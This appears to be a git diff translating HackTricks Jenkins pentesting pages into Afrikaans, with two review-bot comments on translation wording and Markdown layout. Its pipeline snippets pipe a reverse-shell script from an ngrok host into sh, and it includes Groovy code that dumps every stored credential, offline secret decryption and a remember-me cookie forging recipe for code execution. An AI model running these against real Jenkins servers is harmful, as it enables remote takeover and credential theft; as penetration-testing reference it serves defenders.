'SLACK_URL'),]) { - sh ''' - curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS - ''' - } - } - } +stages { +stage("Build") { +environment { +STAGE_ENV_VAR = "Test stage ENV variables." 
+} +steps { +withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), +string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { +sh ''' +curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS +''' +} +} +} - post { - always { - cleanWs() - } - } +post { +always { +cleanWs() +} +} } ``` - -## Arbitrary File Read to RCE +## Arbitraire LĂȘer Lees na RCE {{#ref}} jenkins-arbitrary-file-read-to-rce-via-remember-me.md 
@@ -326,43 +306,40 @@ jenkins-rce-creating-modifying-project.md jenkins-rce-creating-modifying-pipeline.md {{#endref}} -## Post Exploitation +## Post Exploitatie ### Metasploit - ``` msf> post/multi/gather/jenkins_gather ``` +### Jenkins Geheime -### Jenkins Secrets +Jy kan die geheime lys deur toegang te verkry tot `/credentials/` as jy genoeg regte het. Let daarop dat dit slegs die geheime binne die `credentials.xml` lĂȘer sal lys, maar **bou konfigurasielĂȘers** mag ook **meer krediete** hĂȘ. -You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**. - -If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**. +As jy **die konfigurasie van elke projek kan sien**, kan jy ook daar die **name van die krediete (geheime)** sien wat gebruik word om toegang tot die repository te verkry en **ander krediete van die projek**. ![](<../../images/image (180).png>) -#### From Groovy +#### Van Groovy {{#ref}} jenkins-dumping-secrets-from-groovy.md {{#endref}} -#### From disk +#### Van skyf -These files are needed to **decrypt Jenkins secrets**: +Hierdie lĂȘers is nodig om **Jenkins geheime te ontsleutel**: - secrets/master.key - secrets/hudson.util.Secret -Such **secrets can usually be found in**: +Sulke **geheime kan gewoonlik gevind word in**: - credentials.xml - jobs/.../build.xml - jobs/.../config.xml -Here's a regex to find them: - +Hier is 'n regex om hulle te vind: ```bash # Find the secrets grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" 
@@ -372,11 +349,9 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" # Secret example credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==} ``` - #### Decrypt Jenkins secrets offline -If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**. - +As jy die **nodige wagwoorde om die geheime te ontsleutel** afgelaai het, gebruik [**hierdie skrif**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **om daardie geheime te ontsleutel**. ```bash python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml 06165DF2-C047-4402-8CAB-1C8EC526C115 
@@ -384,23 +359,20 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT ``` - -#### Decrypt Jenkins secrets from Groovy - +#### Ontsleutel Jenkins geheime vanaf Groovy ```bash println(hudson.util.Secret.decrypt("{...}")) ``` +### Skep nuwe admin gebruiker -### Create new admin user +1. Toegang die Jenkins config.xml lĂȘer in `/var/lib/jenkins/config.xml` of `C:\Program Files (x86)\Jenkis\` +2. Soek vir die woord `true` en verander die woord **`true`** na **`false`**. +1. `sed -i -e 's/truefalsetrue` en **herstart die Jenkins weer**. -1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\` -2. Search for the word `true`and change the word \*\*`true` \*\* to **`false`**. - 1. `sed -i -e 's/truefalsetrue` and **restart the Jenkins again**. - -## References +## Verwysings - [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins) - [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/) @@ -410,7 +382,3 @@ println(hudson.util.Secret.decrypt("{...}")) - [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md index 6e62a8536..944235eaf 100644 --- a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md +++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md 
@@ -6,48 +6,48 @@ ### Username + Password -The most common way to login in Jenkins if with a username or a password +Die mees algemene manier om in te log in Jenkins is met 'n gebruikersnaam of 'n wagwoord. ### Cookie -If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen). +As 'n **geautoriseerde koekie gesteel word**, kan dit gebruik word om toegang te verkry tot die gebruiker se sessie. Die koekie word gewoonlik `JSESSIONID.*` genoem. (‘n Gebruiker kan al sy sessies beĂ«indig, maar hy moet eers uitvind dat 'n koekie gesteel is). ### SSO/Plugins -Jenkins can be configured using plugins to be **accessible via third party SSO**. +Jenkins kan geconfigureer word met behulp van plugins om **toeganklik te wees via derdeparty SSO**. ### Tokens -**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API. +**Gebruikers kan tokens genereer** om toegang te gee aan toepassings om hulle via CLI of REST API na te boots. ### SSH Keys -This component provides a built-in SSH server for Jenkins. It’s an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/)) +Hierdie komponent bied 'n ingeboude SSH-bediener vir Jenkins. Dit is 'n alternatiewe koppelvlak vir die [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), en opdragte kan op hierdie manier met enige SSH-kliĂ«nt aangeroep word. (Van die [docs](https://plugins.jenkins.io/sshd/)) ## Authorization -In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options: +In `/configureSecurity` is dit moontlik om die **autorisasiemetode van Jenkins te configureer**. 
Daar is verskeie opsies: -- **Anyone can do anything**: Even anonymous access can administrate the server -- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access. -- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**. -- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**. +- **Enigeen kan enigiets doen**: Selfs anonieme toegang kan die bediener administreer. +- **Legacy mode**: Dieselfde as Jenkins <1.164. As jy die **"admin" rol** het, sal jy **volledige beheer** oor die stelsel ontvang, en **andersins** (insluitend **anonieme** gebruikers) sal jy **lees** toegang hĂȘ. +- **Aangemelde gebruikers kan enigiets doen**: In hierdie modus, elke **aangemelde gebruiker kry volledige beheer** van Jenkins. Die enigste gebruiker wat nie volledige beheer sal hĂȘ nie, is die **anonieme gebruiker**, wat net **lees toegang** kry. +- **Matrix-gebaseerde sekuriteit**: Jy kan **wie wat kan doen** in 'n tabel configureer. Elke **kolom** verteenwoordig 'n **toestemming**. Elke **ry** **verteenwoordig** 'n **gebruiker of 'n groep/rol.** Dit sluit 'n spesiale gebruiker '**anoniem**' in, wat **ongemagtigde gebruikers** verteenwoordig, sowel as '**geverifieerde**', wat **alle geverifieerde gebruikers** verteenwoordig. 
![](<../../images/image (149).png>) -- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.** -- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`. +- **Projek-gebaseerde Matrix Autorisasiestrategie:** Hierdie modus is 'n **uitbreiding** van "**Matrix-gebaseerde sekuriteit**" wat toelaat dat addisionele ACL-matrix **vir elke projek apart gedefinieer word.** +- **Rol-gebaseerde Strategie:** Maak dit moontlik om autorisasies te definieer met 'n **rol-gebaseerde strategie**. Bestuur die rolle in `/role-strategy`. ## **Security Realm** -In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms: +In `/configureSecurity` is dit moontlik om die **sekuriteitsgebied te configureer.** Standaard sluit Jenkins ondersteuning in vir 'n paar verskillende Sekuriteitsgebiede: -- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/). -- **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default. -- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups. -- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization. +- **Delegeer aan servlet-container**: Vir **delegasie van autentisering aan 'n servlet-container wat die Jenkins-beheerder uitvoer**, soos [Jetty](https://www.eclipse.org/jetty/). 
+- **Jenkins se eie gebruikersdatabasis:** Gebruik **Jenkins se eie ingeboude gebruikersdatastoor** vir autentisering in plaas van om aan 'n eksterne stelsel te delegeer. Dit is standaard geaktiveer. +- **LDAP**: Delegeer alle autentisering aan 'n geconfigureerde LDAP-bediener, insluitend beide gebruikers en groepe. +- **Unix gebruikers/groep databasis**: **Delegeer die autentisering aan die onderliggende Unix** OS-vlak gebruikersdatabasis op die Jenkins-beheerder. Hierdie modus sal ook die hergebruik van Unix-groepe vir autorisasie toelaat. -Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as: +Plugins kan addisionele sekuriteitsgebiede bied wat nuttig kan wees om Jenkins in bestaande identiteitsisteme in te sluit, soos: - [Active Directory](https://plugins.jenkins.io/active-directory) - [GitHub Authentication](https://plugins.jenkins.io/github-oauth) 
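Review bot: in the `### Username + Password` hunk of basic-jenkins-information.md the translation keeps the source's slip "with a username or a password" as "met 'n gebruikersnaam of 'n wagwoord"; a Jenkins form login needs both, so this should read "met 'n gebruikersnaam en wagwoord". Two consistency points in the same hunk: the section headings (`### Cookie`, `### Tokens`, `## Authorization`, `## **Security Realm**`) stay in English while the README.md hunk above translates its headings (`## Verwysings`), and the spelling "geconfigureer"/"configureer" is Dutch-style where the project hunk later in this patch uses "konfigureer"; pick one form for the whole patch.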
@@ -55,31 +55,31 @@ Plugins can provide additional security realms which may be useful for incorpora ## Jenkins Nodes, Agents & Executors -Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/): +Definisies van die [docs](https://www.jenkins.io/doc/book/managing/nodes/): -**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold. +**Nodes** is die **masjiene** waarop bou **agents werk**. Jenkins monitor elke aangehegte node vir skyfspasie, vrye tydelike ruimte, vrye swap, klok tyd/sink en reaksietyd. 'n Node word vanlyn geneem as enige van hierdie waardes buite die geconfigureerde drempel gaan. -**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine. +**Agents** **bestuur** die **taakuitvoering** namens die Jenkins-beheerder deur **executors** te gebruik. 'n Agent kan enige bedryfstelsel gebruik wat Java ondersteun. Gereedskap wat benodig word vir bou en toetse word op die node geĂŻnstalleer waar die agent loop; hulle kan **direk of in 'n houer** (Docker of Kubernetes) geĂŻnstalleer word. Elke **agent is effektief 'n proses met sy eie PID** op die gasheer masjien. -An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. 
In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time. +'n **executor** is 'n **gleuf vir die uitvoering van take**; effektief, dit is **'n draad in die agent**. Die **aantal executors** op 'n node definieer die aantal **gelyktydige take** wat op daardie node op 'n slag uitgevoer kan word. Met ander woorde, dit bepaal die **aantal gelyktydige Pipeline `stages`** wat op daardie node op 'n slag kan uitvoer. ## Jenkins Secrets ### Encryption of Secrets and Credentials -Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. 
Common key ids include: +Definisie van die [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins gebruik **AES om geheime**, kredensiale, en hul onderskeie versleuteling sleutels te versleutel en te beskerm. Hierdie versleuteling sleutels word gestoor in `$JENKINS_HOME/secrets/` saam met die meester sleutel wat gebruik word om genoemde sleutels te beskerm. Hierdie gids moet geconfigureer word sodat slegs die bedryfstelsel gebruiker wat die Jenkins-beheerder uitvoer, lees- en skrywe toegang tot hierdie gids het (d.w.s. 'n `chmod` waarde van `0700` of deur toepaslike lĂȘer eienskappe te gebruik). Die **meester sleutel** (soms verwys as 'n "sleutel versleuteling sleutel" in cryptojargon) is **gestoor \_onversleuteld\_** op die Jenkins-beheerder lĂȘerstelsel in **`$JENKINS_HOME/secrets/master.key`** wat nie teen aanvallers met direkte toegang tot daardie lĂȘer beskerm nie. Meeste gebruikers en ontwikkelaars sal hierdie versleuteling sleutels indirek gebruik via Ăłf die [Secret](https://javadoc.jenkins.io/byShortName/Secret) API vir die versleuteling van generiese geheime data of deur die kredensiale API. Vir die cryptocurious, gebruik Jenkins AES in cipher block chaining (CBC) modus met PKCS#5 padding en random IVs om voorbeelde van [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) te versleutel wat gestoor word in `$JENKINS_HOME/secrets/` met 'n lĂȘernaam wat ooreenstem met hul `CryptoConfidentialKey` id. 
Algemene sleutel id's sluit in: -- `hudson.util.Secret`: used for generic secrets; -- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types; -- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and +- `hudson.util.Secret`: gebruik vir generiese geheime; +- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: gebruik vir sommige kredensiale tipes; +- `jenkins.model.Jenkins.crumbSalt`: gebruik deur die [CSRF beskermingsmeganisme](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); en ### Credentials Access -Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job//configure`) and therefore only accessible from the specific project. +Kredensiale kan **geskik word vir globale verskaffers** (`/credentials/`) wat deur enige geconfigureerde projek toegang verkry kan word, of kan geskik word vir **spesifieke projekte** (`/job//configure`) en dus slegs vanaf die spesifieke projek toeganklik wees. -According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials. +Volgens [**die docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Kredensiale wat in die omvang is, word sonder beperking aan die pyplyn beskikbaar gestel. 
Om **per ongeluk blootstelling in die boulog te voorkom**, word kredensiale **gemasker** van gewone uitvoer, so 'n aanroep van `env` (Linux) of `set` (Windows), of programme wat hul omgewing of parameters druk, sou **nie hulle in die boulog onthul nie** aan gebruikers wat andersins nie toegang tot die kredensiale sou hĂȘ nie. -**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.** +**Dit is waarom 'n aanvaller, om die kredensiale te ontvoer, byvoorbeeld, hulle in base64 moet kodifiseer.** ## References @@ -92,7 +92,3 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m - [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md index 9d2b232e1..3a50c496d 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md 
@@ -2,108 +2,104 @@ {{#include ../../banners/hacktricks-training.md}} -In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) +In hierdie blogpos is dit moontlik om 'n uitstekende manier te vind om 'n Local File Inclusion kwesbaarheid in Jenkins in RCE te transformeer: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) -This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own: +Dit is 'n KI-gegenereerde opsomming van die deel van die pos waar die vervaardiging van 'n arbitrĂȘre koekie misbruik word om RCE te verkry deur 'n plaaslike lĂȘer te lees totdat ek tyd het om 'n opsomming op my eie te skep: -### Attack Prerequisites +### Aanval Voorvereistes -- **Feature Requirement:** "Remember me" must be enabled (default setting). -- **Access Levels:** Attacker needs Overall/Read permissions. -- **Secret Access:** Ability to read both binary and textual content from key files. +- **Kenmerk Vereiste:** "Remember me" moet geaktiveer wees (standaardinstelling). +- **Toegangsvlakke:** Aanvaller benodig Algemene/Lees regte. +- **Geheime Toegang:** VermoĂ« om beide binĂȘre en teksinhoud van sleutel lĂȘers te lees. 
-### Detailed Exploitation Process +### Gedetailleerde Exploitasiestap -#### Step 1: Data Collection +#### Stap 1: Data Versameling -**User Information Retrieval** +**Gebruiker Inligting Herwinning** -- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather: - - **Username** - - **User seed** - - **Timestamp** - - **Password hash** +- Toegang tot gebruiker konfigurasie en geheime van `$JENKINS_HOME/users/*.xml` vir elke gebruiker om te versamel: +- **Gebruikersnaam** +- **Gebruiker saad** +- **Tydstempel** +- **Wagwoord hash** -**Secret Key Extraction** +**Geheime Sleutel Uittrekking** -- Extract cryptographic keys used for signing the cookie: - - **Secret Key:** `$JENKINS_HOME/secret.key` - - **Master Key:** `$JENKINS_HOME/secrets/master.key` - - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` +- Trek kriptografiese sleutels uit wat gebruik word om die koekie te teken: +- **Geheime Sleutel:** `$JENKINS_HOME/secret.key` +- **Meester Sleutel:** `$JENKINS_HOME/secrets/master.key` +- **MAC Sleutel LĂȘer:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` -#### Step 2: Cookie Forging +#### Stap 2: Koekie Vervalsing -**Token Preparation** +**Token Voorbereiding** -- **Calculate Token Expiry Time:** +- **Bereken Token Vervaldatum:** - ```javascript - tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time - ``` +```javascript +tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Voeg een uur by die huidige tyd +``` -- **Concatenate Data for Token:** +- **Konkateer Data vir Token:** - ```javascript - token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey - ``` +```javascript +token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey +``` -**MAC Key Decryption** +**MAC Sleutel Ontsleuteling** -- **Decrypt 
MAC Key File:** +- **Ontsleutel MAC Sleutel LĂȘer:** - ```javascript - key = toAes128Key(masterKey) // Convert master key to AES128 key format - decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file - if not decrypted.hasSuffix("::::MAGIC::::") - return ERROR; - macKey = decrypted.withoutSuffix("::::MAGIC::::") - ``` +```javascript +key = toAes128Key(masterKey) // Convert meester sleutel na AES128 sleutel formaat +decrypted = AES.decrypt(macFile, key) // Ontsleutel die .mac lĂȘer +if not decrypted.hasSuffix("::::MAGIC::::") +return ERROR; +macKey = decrypted.withoutSuffix("::::MAGIC::::") +``` -**Signature Computation** +**Handtekening Berekening** -- **Compute HMAC SHA256:** +- **Bereken HMAC SHA256:** - ```javascript - mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key - tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string - ``` +```javascript +mac = HmacSHA256(token, macKey) // Bereken HMAC met die token en MAC sleutel +tokenSignature = bytesToHexString(mac) // Convert die MAC na 'n hexadesimale string +``` -**Cookie Encoding** +**Koekie Kodering** -- **Generate Final Cookie:** +- **Genereer Finale Koekie:** - ```javascript - cookie = base64.encode( - username + ":" + tokenExpiryTime + ":" + tokenSignature - ) // Base64 encode the cookie data - ``` +```javascript +cookie = base64.encode( +username + ":" + tokenExpiryTime + ":" + tokenSignature +) // Base64 kodeer die koekie data +``` -#### Step 3: Code Execution +#### Stap 3: Kode Uitvoering -**Session Authentication** +**Sessie Verifikasie** -- **Fetch CSRF and Session Tokens:** - - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`. - - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie. +- **Haal CSRF en Sessie Tokens:** +- Maak 'n versoek na `/crumbIssuer/api/json` om `Jenkins-Crumb` te verkry. 
+- Vang `JSESSIONID` uit die antwoord, wat saam met die remember-me koekie gebruik sal word. -**Command Execution Request** +**Opdrag Uitvoeringsversoek** -- **Send a POST Request with Groovy Script:** +- **Stuur 'n POST Versoek met Groovy Skrip:** - ```bash - curl -X POST "$JENKINS_URL/scriptText" \ - --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ - --header "Jenkins-Crumb: $CRUMB" \ - --header "Content-Type: application/x-www-form-urlencoded" \ - --data-urlencode "script=$SCRIPT" - ``` +```bash +curl -X POST "$JENKINS_URL/scriptText" \ +--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ +--header "Jenkins-Crumb: $CRUMB" \ +--header "Content-Type: application/x-www-form-urlencoded" \ +--data-urlencode "script=$SCRIPT" +``` - - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment. +- Groovy skrip kan gebruik word om stelselniveau opdragte of ander operasies binne die Jenkins omgewing uit te voer. -The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely. +Die voorbeeld curl opdrag wat verskaf word demonstreer hoe om 'n versoek aan Jenkins te maak met die nodige koptekste en koekies om arbitrĂȘre kode veilig uit te voer. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md index 8699b8159..9bce99040 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md 
@@ -3,10 +3,9 @@ {{#include ../../banners/hacktricks-training.md}} > [!WARNING] -> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**. - -You can **dump all the secrets from the Groovy Script console** in `/script` running this code +> Let daarop dat hierdie skripte slegs die geheime binne die `credentials.xml`-lĂȘer sal lys, maar **boukonfigurasielĂȘers** mag ook **meer kredensiale** hĂȘ. +Jy kan **alle geheime uit die Groovy Script-konsol** in `/script` dump deur hierdie kode te loop ```java // From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/ import jenkins.model.* 
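Review bot: the blank line that separated the `> [!WARNING]` callout from the next paragraph was dropped in this hunk, so `Jy kan **alle geheime uit die Groovy Script-konsol** in `/script` dump deur hierdie kode te loop` now follows `> Let daarop dat hierdie skripte ...` directly; in CommonMark a non-blank line right after a blockquote is a lazy continuation, so that sentence will be rendered inside the warning box instead of as body text introducing the code. Keep the blank line between the blockquote and the paragraph; a translation pass should change words, not block structure.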
@@ -42,52 +41,45 @@ showRow("something else", it.id, '', '', '') return ``` - -#### or this one: - +#### of hierdie een: ```java import java.nio.charset.StandardCharsets; def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( - com.cloudbees.plugins.credentials.Credentials.class +com.cloudbees.plugins.credentials.Credentials.class ) for (c in creds) { - println(c.id) - if (c.properties.description) { - println(" description: " + c.description) - } - if (c.properties.username) { - println(" username: " + c.username) - } - if (c.properties.password) { - println(" password: " + c.password) - } - if (c.properties.passphrase) { - println(" passphrase: " + c.passphrase) - } - if (c.properties.secret) { - println(" secret: " + c.secret) - } - if (c.properties.secretBytes) { - println(" secretBytes: ") - println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8)) - println("") - } - if (c.properties.privateKeySource) { - println(" privateKey: " + c.getPrivateKey()) - } - if (c.properties.apiToken) { - println(" apiToken: " + c.apiToken) - } - if (c.properties.token) { - println(" token: " + c.token) - } - println("") +println(c.id) +if (c.properties.description) { +println(" description: " + c.description) +} +if (c.properties.username) { +println(" username: " + c.username) +} +if (c.properties.password) { +println(" password: " + c.password) +} +if (c.properties.passphrase) { +println(" passphrase: " + c.passphrase) +} +if (c.properties.secret) { +println(" secret: " + c.secret) +} +if (c.properties.secretBytes) { +println(" secretBytes: ") +println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8)) +println("") +} +if (c.properties.privateKeySource) { +println(" privateKey: " + c.getPrivateKey()) +} +if (c.properties.apiToken) { +println(" apiToken: " + c.apiToken) +} +if (c.properties.token) { +println(" token: " + c.token) +} +println("") } ``` - {{#include ../../banners/hacktricks-training.md}} 
- - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md index 89ca15223..dc89eeb70 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md @@ -2,42 +2,36 @@ {{#include ../../banners/hacktricks-training.md}} -## Creating a new Pipeline +## Skep 'n nuwe Pyplyn -In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:** +In "Nuwe Item" (toeganklik in `/view/all/newJob`) kies **Pyplyn:** ![](<../../images/image (235).png>) -In the **Pipeline section** write the **reverse shell**: +In die **Pyplyn afdeling** skryf die **reverse shell**: ![](<../../images/image (285).png>) - ```groovy pipeline { - agent any +agent any - stages { - stage('Hello') { - steps { - sh ''' - curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh - ''' - } - } - } +stages { +stage('Hello') { +steps { +sh ''' +curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh +''' +} +} +} } ``` - Finally click on **Save**, and **Build Now** and the pipeline will be executed: ![](<../../images/image (228).png>) ## Modifying a Pipeline -If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed. +As jy toegang het tot die konfigurasie-lĂȘer van 'n sekere geconfigureerde pyplyn, kan jy dit eenvoudig **wysig deur jou omgekeerde skulp by te voeg** en dit dan uitvoer of wag totdat dit uitgevoer word. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md index f16096070..9c20b0d5b 100644 
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md 
